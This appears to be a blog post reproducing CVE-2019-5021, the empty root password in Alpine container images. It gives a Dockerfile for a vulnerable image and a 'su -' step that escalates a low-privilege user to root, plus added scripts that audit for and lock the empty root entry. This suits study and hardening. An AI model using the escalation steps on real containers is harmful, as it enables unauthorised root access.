CVE Vulnerability Reproduction: CVE-2019-5021 Image Vulnerability Exploitation

CVE-2019-5021 Image Vulnerability Exploitation

With the popularity of container technology, container images have become a very important part of the software supply chain. Just as people use tools such as pip to obtain programming libraries from package repositories, they can pull images from Docker Hub or third-party registries, develop on top of them to implement the required functionality, and finally package and release the result.

However, the base image a business relies on may itself have problems, whether a security hole accidentally introduced by a developer or malicious code deliberately planted by an attacker. The potential harm of this "endogenous risk" is far more serious than that of an attacker launching an attack from outside, and it is less likely to be detected.

Let's introduce one kind of container software supply chain attack: image vulnerability exploitation.

Image vulnerability exploitation

Image vulnerability exploitation refers to the fact that when the image itself contains a vulnerability, every container created and run from that image usually carries the same vulnerability. Attackers can therefore exploit the vulnerability in the image to attack the containers, which often yields twice the result for half the effort.

For example, Alpine is a lightweight Linux distribution built on top of musl libc and busybox. Software built on top of Alpine is very popular because of its small size. But there was a vulnerability in the Alpine image: CVE-2019-5021. In Alpine images of versions 3.3 to 3.9, the root user's password is set to empty, and an attacker who has already broken into a container may use this to escalate to root privileges inside it.

This vulnerability looks very simple, but its CVSS 3.0 score is as high as 9.8. We pull a version 3.3 image, start a container from it and check the password file /etc/shadow; as shown in the figure, the root password recorded in the shadow file is indeed empty:

# Pull the alpine:3.3 image
docker pull alpine:3.3
# Show the root password recorded in the shadow file
docker run -it --rm alpine:3.3 cat /etc/shadow | grep root

[Figure: output of the command above; the root entry in /etc/shadow has an empty password field]
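The check above can be turned into a small audit that does not need a human to read the shadow file. The following shell script is an added example (not part of the original post or of the Alpine project): check_root_shadow reads /etc/shadow-format lines on stdin and classifies the root account's password field, and audit_image (an assumed helper name; it requires the docker CLI) runs that check against any pulled image. The shadow lines at the bottom are constructed samples modelled on the alpine:3.3 output, not real captured data.

```shell
#!/bin/sh
# check_root_shadow: read /etc/shadow-format lines on stdin and print the
# state of the root account's password field (the second colon field):
#   EMPTY   - no password at all: the CVE-2019-5021 condition
#   LOCKED  - field starts with "!" or "*": login by password is disabled
#   HASHED  - a real password hash is present
#   MISSING - no root entry was found
check_root_shadow() {
    awk -F: '
        $1 == "root" {
            found = 1
            if ($2 == "")            print "EMPTY"
            else if ($2 ~ /^[!*]/)   print "LOCKED"
            else                     print "HASHED"
            exit            # awk still runs the END block after exit
        }
        END { if (!found) print "MISSING" }
    '
}

# audit_image IMAGE: dump the image's shadow file with a throwaway container
# and classify it. Assumes the docker CLI is installed and the image is pulled.
audit_image() {
    docker run --rm "$1" cat /etc/shadow 2>/dev/null | check_root_shadow
}

# Constructed sample modelled on what alpine:3.3 ships (not captured output).
SAMPLE_VULNERABLE='root:::0:::::
bin:!::0:::::'

# Constructed sample of the same file after the root account has been locked.
SAMPLE_FIXED='root:!::0:::::
bin:!::0:::::'

printf '%s\n' "$SAMPLE_VULNERABLE" | check_root_shadow   # prints EMPTY
printf '%s\n' "$SAMPLE_FIXED" | check_root_shadow        # prints LOCKED
```

In practice the function is run as `audit_image alpine:3.3` against every base image before it enters a build pipeline; anything other than LOCKED or HASHED is a finding. Note that the check inspects the image's own /etc/shadow, so it also covers images that were rebuilt from an affected base and never touched the root entry.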

The Alpine image uses busybox as its core toolchain, and busybox restricts the tty devices from which the root user may log in through the /etc/securetty file. Unless the user deliberately installs shadow and linux-pam in place of the default toolchain, this vulnerability is very difficult to exploit. Next, let's simulate that scenario: create an image based on Alpine 3.5, add an ordinary user non_root, and install shadow (reference: https://github.com/brant-ruan/cloud-native-security-book/0303-supply chain attack/01-CVE-2019-5021-alpine).

Vulnerability reproduction

We write the following Dockerfile:

# Base image from the affected version range (root password is empty)
FROM alpine:3.5

# Install the shadow package, whose su replaces the busybox one
RUN apk add --no-cache shadow
# Add an unprivileged user to stand in for a low-privilege foothold
RUN adduser -S non_root

# Processes in the container start as the unprivileged user
USER non_root

After creating the file, execute the following command in the same directory as the Dockerfile to build the image:

docker build -t alpine:cve-2019-5021 .

[Figure: output of the docker build command above]

Then run a container and try to execute su to switch to the root user. As shown in the figure, the switch succeeds:

# Run a container
docker run -it --rm alpine:cve-2019-5021 /bin/sh
# Check the current user
whoami
# Switch to the root user
su -

[Figure: whoami reports non_root, and su - switches to root without a password]

The whole process is very simple. In reality, if a user runs an old version of Alpine and also installs shadow, then once an attacker obtains a low-privilege shell in the container through the web service, he can use this vulnerability to escalate directly to root privileges inside the container.
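The scenario above depends on the root entry in /etc/shadow having an empty password field, so the remediation for images that cannot move to a fixed Alpine release is to lock that account during the build. The following shell script is an added example (not part of the original post or of Alpine's own fix): lock_empty_root rewrites shadow-format lines on stdin, turning an empty root password field into "!" (a locked account) and leaving every other line untouched. The shadow lines used for the demonstration are constructed samples, not captured data.

```shell
#!/bin/sh
# lock_empty_root: read /etc/shadow-format lines on stdin and write them
# back with an empty root password field replaced by "!". A "!" prefix
# makes password authentication for the account fail, which is exactly
# what closes the su - path shown in the reproduction; it does not remove
# the root account or affect commands already running as root.
lock_empty_root() {
    awk -F: 'BEGIN { OFS = ":" }
             $1 == "root" && $2 == "" { $2 = "!" }
             { print }'
}

# The same edit as an in-image build step would be (assumed Dockerfile
# lines, not from the original post):
#   RUN sed -i 's/^root::/root:!:/' /etc/shadow
#   RUN ! grep -q '^root::' /etc/shadow    # fail the build if root is still empty

# Constructed sample modelled on the alpine:3.3 shadow file.
SAMPLE_VULNERABLE='root:::0:::::
bin:!::0:::::
non_root:!:18000:0:99999:7:::'

printf '%s\n' "$SAMPLE_VULNERABLE" | lock_empty_root
# prints:
# root:!::0:::::
# bin:!::0:::::
# non_root:!:18000:0:99999:7:::
```

Applying the function a second time is harmless because a locked field is no longer empty, so the rewrite is safe to run in every build regardless of which Alpine tag is used as the base. Pairing it with the grep guard keeps a future base-image change from silently reintroducing the empty password.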


Source: blog.csdn.net/qq_64973687/article/details/132118399